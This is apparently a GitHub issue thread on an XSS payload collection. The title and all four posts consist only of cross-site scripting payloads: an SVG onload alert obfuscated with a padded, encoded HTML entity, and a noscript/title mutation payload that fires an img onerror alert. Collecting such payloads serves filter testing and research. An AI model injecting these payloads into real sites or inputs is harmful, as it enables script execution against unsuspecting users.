### ISSUE TITLE
<svg onload=alert%26%230000000040"1")>

### ISSUE THREAD

**Issue by rmdhfz** [UltimateHackers/AwesomeXSS#16]
<svg onload=alert%26%230000000040"1")>

**Comment by rmdhfz** [comment]
<svg onload=alert%26%230000000040"")>

**Comment by rmdhfz** [comment]
<svg onload=alert%26%230000000040"1")>

**Comment by blackfly06** [comment]
<noscript><p title="</noscript><img src=x onerror=alert(1)>"></p></noscript>
